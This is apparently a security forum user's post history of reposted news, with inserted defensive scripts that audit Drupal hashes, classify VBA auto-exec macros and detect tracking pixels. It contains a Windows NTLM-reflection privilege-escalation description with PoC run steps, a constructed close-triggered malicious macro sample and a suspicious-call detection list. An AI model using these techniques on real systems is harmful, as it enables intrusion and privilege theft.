Everything posted by Aerosol (Posts: 3453, Days Won: 22)
Drupal, one of the most widely used open source content management systems, is recommending that its users update their software to the latest versions, 6.35 and 7.35, after the company discovered two moderately critical vulnerabilities that may allow an attacker to hack Drupal websites. According to a security advisory published yesterday, a flaw found in the Drupal core could allow a potential hacker, under certain circumstances, to bypass security restrictions by forging password reset URLs.

ACCESS BYPASS / PASSWORD RESET URLs VULNERABILITY

Successful exploitation of this Access Bypass vulnerability could allow the hacker to gain unauthorized access to user accounts without knowing their password. This vulnerability is considered moderately critical: an attacker can remotely trick a registered user of a Drupal-based website, such as an administrator, into launching a maliciously crafted URL in an attempt to take control of the target server.

AFFECTED DRUPAL WEBSITES

The exploitation of the access bypass vulnerability on a Drupal 7 website is possible only if the account importing or programmatic editing process results in the password hash in the database being the same for multiple user accounts. Websites running Drupal 6 are at greater risk, because the administrators of the websites have created multiple new user accounts protected by the same password. Moreover, the security vulnerability can also be exploited on Drupal 6 websites where accounts have been imported or programmatically edited in a way that results in the password hash field in the database being empty for at least one user account.

OPEN REDIRECT VULNERABILITY

The affected versions of Drupal CMS are also susceptible to an open redirect vulnerability. Drupal action URLs contain a "destination" parameter, which can be used by cyber criminals to redirect users to a third-party location with malicious content. According to the Drupal team, there are multiple URL-related API functions in affected versions of Drupal 6 and 7 which can be used by attackers to pass through external URLs when not required. This could potentially lead to additional open redirect vulnerabilities. The issue is actually serious because Drupal is used to power over 1 billion websites on the Internet, which puts Drupal in third place behind WordPress and Joomla. Drupal provides a content management system for websites including MTV, Popular Science, Sony Music, Harvard and MIT.

RECOMMENDATIONS

Website administrators are strongly recommended to take the following steps:
- Update to the latest version of Drupal core, i.e. Drupal core 6.35 and Drupal core 7.35.
- Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
- Do not click on links from unknown sources.
- Do not open email attachments from unknown or untrusted sources.
- Consider implementing file extension whitelists for allowed e-mail attachments.

Source
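The advisory's precondition (several accounts sharing one password hash, or an account whose hash field is empty) is something a site owner can audit directly before and after applying the update. The script below is an added example and is not part of the original post or of Drupal core: it builds a constructed in-memory SQLite copy of a Drupal-style users table (the uid/name/pass columns follow the Drupal core schema, the rows are invented sample data) and reports the accounts that would meet either condition. The anonymous account (uid 0) legitimately has an empty hash and is excluded.

```python
"""Audit a Drupal 6/7 style ``users`` table for the two conditions named in
the advisory: duplicate password hashes across accounts, and empty hashes.
Added example with constructed data; not Drupal's own code."""
import sqlite3
from collections import defaultdict

# Constructed sample rows resembling a site whose accounts were imported or
# edited programmatically.  uid 0 is Drupal's anonymous user (empty pass).
SAMPLE_USERS = [
    (0, "", ""),
    (1, "admin", "$S$D-sample-hash-AAAA"),
    (2, "importer_a", "$S$D-shared-hash-BBBB"),
    (3, "importer_b", "$S$D-shared-hash-BBBB"),
    (4, "legacy_c", ""),
    (5, "normal_d", "$S$D-unique-hash-CCCC"),
]


def load_sample_db():
    """Create an in-memory table with the Drupal-style columns and sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def audit_password_hashes(conn):
    """Return (shared, empty).

    shared: {hash: [user names]} for every hash used by two or more accounts
    empty:  user names whose hash field is empty or NULL
    The anonymous user (uid 0) is skipped because its hash is always empty."""
    groups = defaultdict(list)
    empty = []
    rows = conn.execute("SELECT name, pass FROM users WHERE uid <> 0 ORDER BY uid")
    for name, pw_hash in rows:
        if not pw_hash:
            empty.append(name)
        else:
            groups[pw_hash].append(name)
    shared = {h: names for h, names in groups.items() if len(names) > 1}
    return shared, empty


if __name__ == "__main__":
    shared, empty = audit_password_hashes(load_sample_db())
    for pw_hash, names in shared.items():
        print(f"shared hash {pw_hash!r}: {', '.join(names)}")
    for name in empty:
        print(f"empty hash: {name}")
```

Against a live site the same two checks are a `GROUP BY pass HAVING COUNT(*) > 1` query and a `WHERE uid <> 0 AND (pass = '' OR pass IS NULL)` query on the users table; any hit means a forged reset URL for one account could be valid for another until the core update is applied.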
-
The theme looks better the way you've changed it now. What can I say, good luck with the "project". @DeadSoul it's not a special rank, I just like that image and the colour.
-
@Kronzy why are you giving the guy rep? The story behind the Join Date: I had an account from 2006 with a few posts; the name I started using around 2010 is Aerosol, so I wanted to change the name on that old account (but only V.I.P. members were allowed to change their name, so he deleted that account and changed this one's join date to 2006). I hope that clears it up.
-
Facebook Vulnerability Leaks Users' Private Photos
Aerosol replied to Aerosol's topic in Stiri securitate
@quadxenon I missed you, kid, you haven't made a pointless comment on my posts in a while. Let me clear it up for you: the point is that this vulnerability EXISTED, and maybe those who do pentesting, blah, blah, blah, want to see what the guy did (see the video). Have you heard of a bypass or things like that? Again, if you have nothing intelligent to say, or if you only comment for the +1, better not comment at all.
-
If you have enabled the automatic Facebook Photo Sync feature on your iPhone, iPad or Android devices, then beware! Hackers can steal your personal photographs without your knowledge. In 2012, the social network giant introduced the Facebook Photo Sync feature for iPhone, iPad and Android devices which, if you opt in, allows Facebook to automatically sync all the photos saved on your mobile device with your Facebook account. The photos that you have synced from your phone are automatically uploaded in the background to a private Facebook album, which is not visible to any of your Facebook friends or other Facebook users. However, you may then choose to share photos from the album on your Facebook timeline or send them as a message to a friend.

A bug bounty hunter, Laxman Muthiyah, discovered a critical flaw in the Facebook Photo Sync feature and Facebook API that could allow any third-party app to access your personal photos from the hidden Facebook Photo Sync album. It's something that reminds me of "The Fappening" and "The Snappening", in which nude and personal photographs of top celebrities were leaked due to a security flaw in Apple's iCloud file storage service and an unofficial Snapchat messaging service app, respectively. In a blog post published today, Laxman explained that the vulnerability resides in the privilege mechanism that decides which applications are allowed to access synced photos using the vaultimages API. Technically, the synced private photo album should be accessible only by Facebook's official app, but the vulnerability allows any third-party app to get permission to read your personal synced photos. Laxman previously disclosed a vulnerability in the Facebook Graph API mechanism that allowed him to delete any photo album on Facebook owned by any user, any page or any group.

HOW TO DISABLE AUTO-SYNC

Though Facebook has patched the vulnerability reported by Laxman and rewarded him with $10,000 under its bug bounty program, Facebook users are advised to turn off the Facebook Photo Sync feature just to be on the safer side. In order to do so, just go to the Facebook mobile app menu, scroll down and select Account > App Settings > Sync Photos, then choose 'Don't sync my photos.'

Source
-
If you're currently on a Mac computer and using the Chrome browser, then a weird little Apple OS X quirk, just a special thirteen-character string, could cause your tab in Chrome to crash instantly. A string of 13 characters (which appear to be in Assyrian), shown below in an image, is all that is needed to crash any tab in Chrome for OS X; however, this text has no impact on Windows, Android, or iOS operating systems. This Chrome crash vulnerability has already been reported to the open-source Chromium project, which means that Google is likely aware of this troublesome issue.

What steps will reproduce the problem? Any page with [that special character] will crash the Chrome tab on a Mac. Just create any dummy page with the unicode characters, and the Mac Chrome tab will crash hard.
What is the expected result? Expect it not to crash.
What happens instead? It crashes.

Warning: Do not click on this link, which actually points to the bug report on the Chromium product describing the issue, if you are using Chrome on a Mac. If you click, it will immediately cause the Chrome tab in which the link opens to crash. Emil Protalinski of VentureBeat says even the tab showing the news article also crashes for some readers. The issue appears to be small but is really serious, as it is possible for anyone to tweet out the text in question and crash all Chrome for Mac users whose Twitter timeline will load those characters. The developer who discovered this bug gives two different scenarios in which this bug could be abused. "This is pretty serious. You could imagine someone spamming this message in Hangouts/Gmail and just straight-up force crashing all Mac Chrome browsers," the developer said. Furthermore, someone could post this 13-character string on Facebook walls or timelines, and force-crash all Mac Chrome browsers that see the characters in question.

VentureBeat notes that the Chrome crash doesn't happen every time; in some cases, when Chrome renders text differently, Mac users see 13 blank rectangles (????? ??? ?????) instead of the crash, though they never see the proper characters. It's currently not known why this character causes a Chrome tab to crash while rendering the page, but we recommend that you do not use these characters while tweeting, dropping them in comments, emailing them to the entire company, posting them to Facebook or using them as the headline of your blog post. If you are curious just how often and why your Chrome is crashing, you can type chrome://crashes into your location bar and press Enter to view the list of crashes.

Source
1 reply. Tagged with: characters, chrome (and 3 more)
-
Source: https://code.google.com/p/google-security-research/issues/detail?id=222

Windows: Local WebDAV NTLM Reflection Elevation of Privilege
Platform: Windows 8.1 Update, Windows 7
Class: Elevation of Privilege

Summary: A default installation of Windows 7/8 can be made to perform an NTLM reflection attack through WebDAV which allows a local user to elevate privileges to local system.

Description: NTLM reflection is a well known issue with Windows authentication. It's typically abused in networked scenarios to reflect credentials from one machine to another. It used to be possible to reflect credentials back to the same machine, but that was mitigated in MS08-068 by not honouring NTLM authentication sessions already in flight. However, this did nothing to stop cross-protocol attacks. The WebClient service for WebDAV (which is installed and enabled by default, although you'd need to start it using its service trigger) also does NTLM authentication if the server requests it. As Windows has no block on binding to TCP ports < 1024 from a normal user account, we can set up our own WebDAV server running as a normal user bound to localhost (so also no firewall issues). If we can convince another user, ideally local system, to connect to the WebDAV server we can start an NTLM authentication session. This can then be replayed locally to the TCP/IP CIFS service endpoint to authenticate as that user. If this was a local system account then that gives you full local admin privs: you can read/write any file on the system through the admin shares. You could also bind to local named pipes such as the service manager and create a new privileged service.

I'd put money on there being many ways of getting local system to open an arbitrary file, but the easiest one to exploit is Windows Defender (at least on Windows 8.1). You can tell it to initiate a scan of a file, which gets opened under the local system token. Of course this might be a bug in and of itself. No processing of the path is done; it seems to be passed directly to CreateFile. This will cause a WebDAV connection to start to localhost and then NTLM can be negotiated.

I don't believe I've changed the settings on my VMs which would enable this attack. Certainly, reading the Group Policy settings, it seems like local system shouldn't authenticate with the machine account by default, but it seems that you can. I've checked my security settings and they look correct. I've tested it on Windows 8.1 Update with Defender, and on Windows 7 manually executing the open as local system, and they both work.

After a quick search I can't find anyone documenting this for the purposes of local privilege escalation attacks, although it's perhaps an obvious way of abusing the functionality, so I would expect this is not common knowledge. It is the sort of bug which could be being exploited in the wild, considering all it needs is socket access (which is any user) and some way of convincing a privileged user to open the local WebDAV share. Of course, no doubt it can be effectively mitigated using SMB signing, although it isn't clear that the NTLM extended protection is doing anything to stop it. That said, this works in a default installation even with file sharing effectively disabled (at least as far as the GUIs will allow). Even with signing enabled on the client, I guess it's possible that you can reflect the NTLM credentials to a local TCP DCE/RPC endpoint instead to achieve a similar effect. Also, I wouldn't be so sure that WebDAV is the only way of doing this. Another one might be COM marshaling and specifying an endpoint locally (although it might be clever enough to not directly communicate for that one).

Another use for this attack is for negotiating a local impersonation token for local system, which could be used for Token Kidnapping purposes. Calling AcceptSecurityContext from any account with permissions to handle enterprise auth will be handed back an impersonation-level token, even for normal users. But of course network service etc. would have most use for the token.

Proof of Concept: I've provided a PoC which causes the Windows Defender service to open a WebDAV connection as Local System. This is for Windows 8.1 only, as Windows 7's Defender doesn't support the command as far as I know. The credentials are reflected to the local SMB service to write the file dummy.txt to the root of the C: drive. Of course more dangerous things could be done at this point. The PoC is written in Java just because it was the easiest to modify its library. No doubt an existing relay application could be repurposed; for example SmbRelay3 is supposed to be able to relay HTTP to SMB auth, but I didn't try that.

1) Install the latest Java 8 JRE.
2) Start the WebClient service. This could be done in many ways from a normal user; for now just start it using the service manager.
3) Extract the PoC to a directory.
4) Run "java -jar SmbTest.jar" in the extracted directory. This binds the WebDAV server then starts a scan with Defender; after some seconds the exploit should run (there's some slowness in everything starting).

Repro Notes: If the PoC prints that the WebClient service isn't started, then start it. If no HTTP/NTLM traffic is printed to the console, then webdav/mup has marked the server as down. Restart the WebClient service and it should fix it.

Expected Result: It shouldn't be possible to elevate privileges; the SMB connection should fail to authenticate.

Observed Result: Authentication was successful as local system and a file was written to the root of the C drive.

Proof of Concept: http://www.exploit-db.com/sploits/36424.zip

Source
-
Apple on Tuesday pushed out new versions of its Safari browser that address 17 security vulnerabilities in the WebKit engine. Safari 8.04, 7.14 and 6.24 patch multiple memory corruption issues in WebKit, Apple said. "These issues were addressed through improved memory handling," Apple said in its advisory. The advisory is sparse on other details of the individual CVEs; Apple said that users visiting a website hosting an exploit could put the browser at risk of remote code execution or a crash. A separate WebKit vulnerability affects the user interface and could open the door to phishing attacks. "A user interface inconsistency existed in Safari that allowed an attacker to misrepresent the URL," Apple said. "This issue was addressed through improved user interface consistency checks." This is the second set of Apple patches in the last 10 days. The company took care of the FREAK vulnerability in iOS along with another vulnerability that would allow a hacker to remotely restart a user's phone via an SMS message. Apple iOS 8.2 also patched a vulnerability in the iCloud keychain function that was the result of several buffer overflows. Source
-
Pushers of the Dridex banking malware have gone old-school for some time now, moving the malware through phishing messages executed by macros in Microsoft Office documents. While macros have been disabled by default since the release of Office 2007, the malware includes somewhat convincing social engineering that urges the user to enable macros, with directions included, in order to view an important invoice, bill or other sensitive document. The cat and mouse game between attackers and defenders took another turn recently when researchers at Proofpoint discovered that a recent spate of phishing messages contained macro-based attacks that did not execute until the malicious document was closed. The technique involves the inclusion of an AutoClose method, which helps the malware sample evade detection.

"The user is enticed to enable macros and open the attachment, and when they open it, they see a blank page and, under the hood, nothing bad happens," said a Proofpoint advisory. "Instead, the malicious action occurs when the document is closed. The macro payload, in this case, listens for a document close event, and when that happens, the macro executes." The use of this type of VBScript function, Proofpoint said, is effective against sandbox detection capabilities. Malware that delays execution isn't necessarily a new evasion tactic, but attackers have been getting innovative about side-stepping the security protections in place. For example, sandboxes and intrusion detection software became wise to short delays in execution times. By executing only when the document closes, this current strain of Dridex seems to have taken the next step. "As sandboxes have adjusted to also 'wait,' the ability of the malicious macro to run when the document closes expands the infection window and forces a detection sandbox to monitor longer and possibly miss the infection altogether," Proofpoint said. "No matter how long the sandbox waits, infection will not occur, and if the sandbox shuts down or exits without closing the document, the infection action will be missed entirely."

Dridex, once it's implanted on the compromised machine, behaves like most banking malware. It waits for the user to visit their online banking account, injects code onto the bank's site and captures user credentials via an iframe. Dridex and its cousin Cridex are members of the GameOver Zeus family, which is also adept at wire fraud. GoZ uses a peer-to-peer architecture to spread and send stolen goods, opting to forgo a centralized command-and-control. P2P and domain generation algorithm techniques make botnet takedowns difficult and extend the lifespan of such malware schemes. Previous Dridex campaigns have spread via Excel documents laced with a malicious macro. Earlier this month, researchers at Trustwave found a spike of phishing messages using XML files as a lure. The XML files were passed off as remittance advice and payment notifications, and prey on security's trust of text documents to get onto machines. These older Dridex campaigns targeted U.K. banking customers with spam messages spoofing popular companies either based or active in the U.K. Separate spam spikes using macros started in October and continued right through mid-December; messages contained malicious attachments claiming to be invoices from a number of sources, including shipping companies, retailers, software companies, financial institutions and others.

Source
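The practical lesson of the Proofpoint finding for anyone running a sandbox or triaging attachments is that the trigger type of a macro matters as much as its contents: a handler bound to the document-close event never fires if the sandbox simply opens the file and waits. The script below is an added example, not Proofpoint's tooling or any Dridex code. It splits VBA source into procedures, flags the procedures whose names are Office auto-execution handlers (the standard Word/Excel names for the open and close events), lists the risky calls inside each, and reports whether the sample only detonates on close. The embedded macro is a constructed sample that calls a placeholder path.

```python
"""Classify VBA auto-execution handlers by trigger (open vs. close) and list
the risky calls inside each.  Added example with a constructed sample macro;
not Proofpoint's code and not a real Dridex sample."""
import re

# Office auto-execution handler names and the event that fires them.
AUTOEXEC_HANDLERS = {
    "AutoOpen": "open", "Auto_Open": "open",
    "Document_Open": "open", "Workbook_Open": "open",
    "AutoClose": "close", "Auto_Close": "close",
    "Document_Close": "close", "Workbook_BeforeClose": "close",
}

# Calls worth flagging when they appear inside an auto-execution handler.
SUSPICIOUS_CALLS = ("Shell", "CreateObject", "URLDownloadToFile",
                    "WScript.Shell", "Environ")

# Constructed sample: the open handler shows a blank page, the close handler
# launches a placeholder path (no real payload).
SAMPLE_MACRO = """\
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    ' lure: the user sees an empty document and nothing else happens
    ActiveDocument.Content.Text = ""
End Sub

Private Sub Document_Close()
    Dim cmd As String
    cmd = Environ("TEMP") & "\\PLACEHOLDER_PAYLOAD.exe"
    Shell cmd, vbHide
End Sub
"""

SUB_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*\(",
                    re.IGNORECASE)
END_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.IGNORECASE)


def split_procedures(src):
    """Return {procedure name: body text} for every Sub/Function in src."""
    procs, current, body = {}, None, []
    for line in src.splitlines():
        start = SUB_RE.match(line)
        if start:
            current, body = start.group(1), []
        elif END_RE.match(line):
            if current is not None:
                procs[current] = "\n".join(body)
            current = None
        elif current is not None:
            body.append(line)
    return procs


def find_autoexec_triggers(src):
    """List auto-execution handlers with their trigger and suspicious calls."""
    findings = []
    for name, body in split_procedures(src).items():
        trigger = AUTOEXEC_HANDLERS.get(name)
        if trigger is None:
            continue
        calls = [c for c in SUSPICIOUS_CALLS
                 if re.search(r"\b" + re.escape(c) + r"\b", body, re.IGNORECASE)]
        findings.append({"handler": name, "trigger": trigger, "calls": calls})
    return findings


def needs_close_to_detonate(findings):
    """True when every handler that makes a suspicious call fires on close,
    i.e. a sandbox that opens the file and waits will never see the action."""
    armed = [f for f in findings if f["calls"]]
    return bool(armed) and all(f["trigger"] == "close" for f in armed)


if __name__ == "__main__":
    found = find_autoexec_triggers(SAMPLE_MACRO)
    for f in found:
        print(f"{f['handler']:22} fires on {f['trigger']:5} calls: {f['calls']}")
    print("detonates only on close:", needs_close_to_detonate(found))
```

When `needs_close_to_detonate` is true the sandbox run is only meaningful if the harness closes the document (and the application) before the timeout, which is exactly the step the advisory says existing sandboxes were skipping.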
-
Bro, this "Suckciffer" is anything else BUT A HACKER, how can you people call this clueless guy a hacker? God, at his age, instead of having kids and a family, he's busy with the kind of nonsense that 13/14-year-olds with gaming communities do. EPIC TROLL! @wirtz seriously now bro, the guy is pitiful. (At least now we know who Valium's father is...) What proof does he bring? That that guy was the one looking after that house? LOL (the guy is seriously fried.)
-
Congratulations @Kronzy, let us know when they reply. As for you, quadxenon, stop going off-topic in the guy's thread. (You could have sent him a PM that he left his IP in the picture, and that's it.)
-
Intel sharing used as stick, Vice Chancellor says. The US Government threatened to starve Berlin of intelligence if it harboured fugitive document-leaker Edward Snowden, German Vice Chancellor Sigmar Gabriel says. The National Security Agency (NSA) leaker considered Germany as a place of refuge after he fled to Russia from the United States via Hong Kong in 2013. Moscow granted Snowden a three-year residency permit in the country, which expires in August 2017. At that date Snowden will need to apply for citizenship or move elsewhere. In a speech given this week in Hamburg, Gabriel said Washington would withhold information on "plots" and "intelligence matters" if Germany offered Snowden asylum. "They told us they would stop notifying us of plots and other intelligence matters," Gabriel said, according to an Intercept report. The report did not name the US agency or official who made the extraordinary threats. Severing intelligence sharing would appear to place the country of 80 million at heightened risk of terrorist and espionage attacks. Germany would be obligated to extradite Snowden to the US if he entered the country, Gabriel says, and faced being cut off from "all intercepted intelligence sharing" if it offered asylum, according to the report. Questions of whether Snowden should be granted asylum in Germany were raised in November 2013 when the leaker was still under temporary protection from Moscow. German Green Party figure Hans-Christian Ströbele, who was the first parliamentarian to visit the leaker during his Moscow exile, raised the concept after the US had submitted an extradition request for Snowden should he set foot in the country. Vice Chancellor Gabriel said it was "a shame" Snowden was confined to "Vladimir Putin's autocratic Russia". The report comes as Snowden's Russian lawyer Anatoly Kucherena said last month the former sys-admin is reportedly ready to return to the US if he is promised a fair trial. Source
-
Ever feel your eyes glazing over when you see yet another security warning pop up on your monitor? In a first, scientists have used magnetic resonance imaging to measure a human brain's dramatic drop in attention that results when a computer user is subjected to just two security warnings in a short time. In a paper scheduled to be presented next month at the Association for Computing Machinery's CHI 2015 conference, researchers will present data that maps regions of the brain responsible for visual processing. The MRI images show a "precipitous drop" in visual processing after even one repeated exposure to a standard security warning and a "large overall drop" after 13 of them. Previously, such warning fatigue has been observed only indirectly, such as in one study finding that only 14 percent of participants recognized content changes to confirmation dialog boxes, or another that recorded users clicking through one-half of all SSL warnings in less than two seconds.

Building a better mousetrap

The inattention is the result of a phenomenon known as habituation, or the tendency for organisms' neural systems to show partial or complete cessation of responses to stimuli over repeated exposures. Such repetition suppression, or RS, has long been documented in everything from sea slugs to humans. By directly measuring RS in the brains of people exposed to computer security warnings, the scientists were then able to test more effective ways that software makers can alert people to potential risks. The paper, titled "How Polymorphic Warnings Reduce Habituation in the Brain: Insights from an fMRI Study", is one of two to be presented at CHI 2015 that study people's responses to security warnings. A second paper is titled "Improving SSL Warnings: Comprehension and Adherence."

Besides leading to potential improvements in user interfaces, the research may pave the way for better security education, training, and awareness (SETA) programs, password use, and information security policy compliance. The scientists wrote: The experiment was conducted on 25 participants recruited from a university who were native English speakers. The subjects lay on their backs on an MRI table and had a volume coil placed over their heads to allow imaging of the entire brain. The participants then viewed experimental images on a large monitor at the opening of the scanner. In all, each participant viewed a unique set of 560 images.

A second experiment tracked participants' responses to security warnings in a more natural setting while using a laptop computer. To measure attention paid to a particular warning, the researchers analyzed users' mouse cursor movements along the x, y, and z axes using a timestamp of each movement at a millisecond rate. The habituation response caused by humans' frequent exposure to warnings has been documented as long ago as 2006. Since then, numerous studies have supported what many people know intuitively: the more times a website, computer, or smartphone displays a warning, the harder it is to heed its urgent message. The fatigue sets off a vicious cycle in which many end users increasingly make poorly informed security choices and designers add more warnings to counteract the increased threats.

The research team, made up of six scientists from Brigham Young University, the University of Pittsburgh, and Google, went on to test so-called polymorphic warnings. As their name suggests, polymorphic warnings change their colors, text, shapes, and other characteristics rather than presenting the same static content each time. The MRI data showed reduced habituation to repeated warnings that changed. A second measurement using mouse tracking also showed reduced habituation from repeated warnings, and it also showed slower habituation. The findings could be seminal for makers of software and hardware alike as they search for new ways to steer users clear of everything from weak password choices to websites pushing malware. "Polymorphic warnings garner more attention over time due to the novelty of their changing appearance," the researchers wrote. "Changing appearance of the warning reinvigorates attention, especially in brain regions that have been shown to demonstrate RS to exact repetitions of visual stimuli. For this reason, polymorphic warnings that continually change their appearance will slow the rate of habituation."

Source
-
Tagged with: habituation, polymorphic (and 3 more)
-
While some lawmakers claim that a threat information-sharing bill, called CISA, was amended with substantial privacy provisions, privacy experts worry that the bill still lacks enough protections. Last Thursday, the Senate Intelligence Committee approved the Cybersecurity Information Sharing Act (CISA) in a 14 to 1 vote (that followed a closed-door session where several amendments were added to the bill). The legislation, which is said to advocate information-sharing between private companies and government to thwart cyberattacks like the ones striking Sony and Anthem, was strongly contested by the American Civil Liberties Union (ACLU), Electronic Frontier Foundation (EFF), and other privacy rights groups and security experts earlier this month, who said that the bill lacked ample privacy protections in its drafted form. Now that the text of the newly amended bill is available (PDF), grievances remain for some concerning the process through which companies would share information with the government. In a Thursday interview, Gabe Rottman, legislative counsel for the ACLU, told SCMagazine.com that "it's not clear that there would be adequate privacy protections on the front-end when the information is shared with the government." "Once that information is shared, it can flow through the government, including to the Department of Defense, which includes the NSA," he explained. Notably, Sen. Ron Wyden, the sole lawmaker to vote against the bill last week, said in a statement that, "If information-sharing legislation does not include adequate privacy protections then that's not a cybersecurity bill – it's a surveillance bill by another name." In his interview with SCMagazine, ACLU's Rottman added that the scope of surveillance programs revealed by Edward Snowden has shown the government's "tendency to stretch the law as far as it will go" to further surveillance.
"Here, the information would go to DHS, but it could be shared in real time without a privacy sweep, including with the National Security Agency," Rottman said. Source
-
Tagged with: bill, information (and 3 more)
-
WHILE YOU'VE LIKELY never heard of companies like Yeswear, Bananatag, and Streak, they almost certainly know a good deal about you. Specifically, they know when you've opened an email sent by one of their clients, where you are, what sort of device you're on, and whether you've clicked a link, all without your awareness or consent. That sort of email tracking is more common than you might think. A Chrome extension called Ugly Mail shows you who's guilty of doing it to your inbox. Sonny Tulyaganov, Ugly Mail's creator, says he was inspired to write the "tiny script" when a friend told him about Streak, an email-tracking service whose Chrome extension has upwards of 300,000 users. Tulyaganov was appalled. "[Streak] allowed users to track emails, see when, where and what device were used to view email," he recalled to WIRED. "I tried it out and found it very disturbing, so decided to see who is actually tracking emails in my inbox." Once the idea for Ugly Mail was born, it only took a few hours to make it a reality.

The reason it was so easy to create is that the kind of tracking it monitors is itself a simple procedure. Marketers, or anyone who's inspired to snoop, simply insert a transparent 1×1 image into an email. When that email is opened, the image pings the server it originated from with information like the time, your location, and the device you're using. It's a read receipt on steroids that you never signed up for. Pixel tracking is a long-established practice, and there's nothing remotely illegal or even particularly discouraged about it; Google even has a support page dedicated to guiding advertisers through the process. That doesn't make it any less unsettling to see just how closely your inbox activity is being monitored. Using Ugly Mail is as simple as the service is effective. Once you've installed it, the code identifies emails that include tracking pixels from any of the three services mentioned above. Those messages will appear in your inbox with an eye icon next to the subject heading, letting you know that once clicked, it will alert the sender. Tulyaganov also confirmed to WIRED that Ugly Mail doesn't store, save, or transmit any data from your Gmail account or computer; everything takes place on the user's end.

Ugly Mail appears to work as advertised in our test, but it has its limitations. It's only built for Gmail (sorry… Outlookers?) and is only available for Chrome, although Tulyaganov says that Firefox and Safari versions are in the works. And while it's effective against Yeswear, Bananatag, and Streak, those are just three pixel-tracking providers in a sea of sneaking marketers. Tulyaganov has indicated that Ugly Mail will continue to add more tracking services to its list, but it's not clear yet how long that might take. The onrush of users after receiving top billing on Product Hunt may help speed up the process. If you'd like to take the extra step of just blocking pixel tracking altogether, another Chrome extension called PixelBlock, also referenced on Product Hunt, automatically prevents all attempts, instead of Ugly Mail's more passive strategy of simply informing you that they're happening. Pixel tracking isn't going away any time soon, and Ugly Mail is an imperfect way to prevent it. But it still offers a valuable glimpse at the marketing machinations we're all exposed to every day, whether we're aware of them or not.

Source
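The article describes Ugly Mail as matching the pixels of three known providers, which is why it misses the rest of the "sea of sneaking marketers". The detector below is an added example, not Ugly Mail's code: it generalises the check to the shape of the trick itself, flagging any remotely loaded image that is one pixel or smaller, or hidden by inline CSS, and returning the host that would receive the open notification. The e-mail body is a constructed sample using reserved .test hostnames; inline (cid:) images are skipped because they never leave the message.

```python
"""Find tracking pixels in an HTML e-mail body by their shape rather than by
a provider list.  Added example with a constructed message; not Ugly Mail."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message: one real logo, two tracking pixels (one sized
# 1x1, one hidden with CSS) and one inline 1x1 image that never phones home.
SAMPLE_EMAIL = """\
<html><body>
<p>Hi, your invoice is attached.</p>
<img src="https://cdn.example-mailer.test/logo.png" width="120" height="40" alt="logo">
<img src="https://track.example-tracker.test/open/abc123.gif" width="1" height="1" alt="">
<img src="https://beacon.example-pixel.test/p.png" style="display:none; width:0; height:0">
<img src="cid:inline-photo-1" width="1" height="1">
</body></html>
"""


class _ImgCollector(HTMLParser):
    """Collect the attribute dictionary of every <img> tag in the document."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":  # HTMLParser lowercases tag and attribute names
            self.images.append({k: (v or "") for k, v in attrs})


def _px(value):
    """'1', '1px', ' 0 ' -> int; None when absent or not numeric."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def _style_px(style, prop):
    """Pixel value of width/height declared in an inline style, else None."""
    m = re.search(r"(?:^|;)\s*" + prop + r"\s*:\s*(\d+)", style)
    return int(m.group(1)) if m else None


def is_tracking_pixel(attrs):
    """True for a remotely loaded image that is <=1px square or hidden."""
    style = attrs.get("style", "").lower()
    compact = style.replace(" ", "")
    width = _px(attrs["width"]) if "width" in attrs else _style_px(style, "width")
    height = _px(attrs["height"]) if "height" in attrs else _style_px(style, "height")
    tiny = width is not None and height is not None and width <= 1 and height <= 1
    hidden = "display:none" in compact or "visibility:hidden" in compact
    # Only http(s) sources notify a server; cid:/data: images stay local.
    remote = urlparse(attrs.get("src", "")).scheme in ("http", "https")
    return remote and (tiny or hidden)


def find_tracking_pixels(html):
    """Return the hostnames that would be notified when the mail is rendered."""
    parser = _ImgCollector()
    parser.feed(html)
    return [urlparse(a["src"]).hostname for a in parser.images if is_tracking_pixel(a)]


if __name__ == "__main__":
    for host in find_tracking_pixels(SAMPLE_EMAIL):
        print("tracking pixel reports to:", host)
```

Blocking rather than flagging (the PixelBlock approach mentioned in the article) amounts to rewriting or dropping the `src` of every image this function matches before the client renders the message, which is the same decision point.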
-
@Kronzy. https://rstforums.com/forum/97612-top-os-app-vulnerable-2014-a.rst What else do you have to say now?
-
Hackers are targeting a number of European businesses and organisations with a spear phishing campaign with the colourful codename Operation Woolen Goldfish. Trend Micro researchers reported uncovering the campaign in an Operation Woolen-Goldfish: When Kittens Go Phishing white paper, warning the attacks are likely a follow-up to the "Rocket Kitten" campaign discovered in December 2014. "In February 2015, the Trend Micro Smart Protection Network received an alert from Europe that triggered several targeted attack indicators related to a specific malware family, prompting our threat defence experts to investigate further," read the report. "The alert showed an infected Microsoft Excel file that soon proved to have been launched by Rocket Kitten." Rocket Kitten was an attack campaign that targeted victims with basic spear phishing messages designed to entice them to open malicious Office files loaded with a rare "Ghole" malware. Trend Micro said the follow-up Woolen Goldfish campaign is far more sophisticated. "By the end of 2014 we saw significant changes in the attack behavior of the Rocket Kitten group in terms of spear-phishing campaigns and malware infection schemes," read the paper. The firm highlighted a Woolen Goldfish attack targeting an Israeli engineer as proof of the group's evolution. "The attackers used a OneDrive link in their campaign. OneDrive is a free online cloud storage system from Microsoft that comes with several gigabytes of data storage capacity," explained the report. "The attackers probably decided to store their malicious binaries online rather than send them as an attachment to bypass email detection. "Once executed, the file drops a non-malicious PowerPoint file used as a decoy file, while silently infecting the system with a variant of the CWoolger keylogger." Trend Micro said the CWoolger keylogger malware appears to have been developed by a hacker operating under the "Wool3n.H4t" pseudonym. 
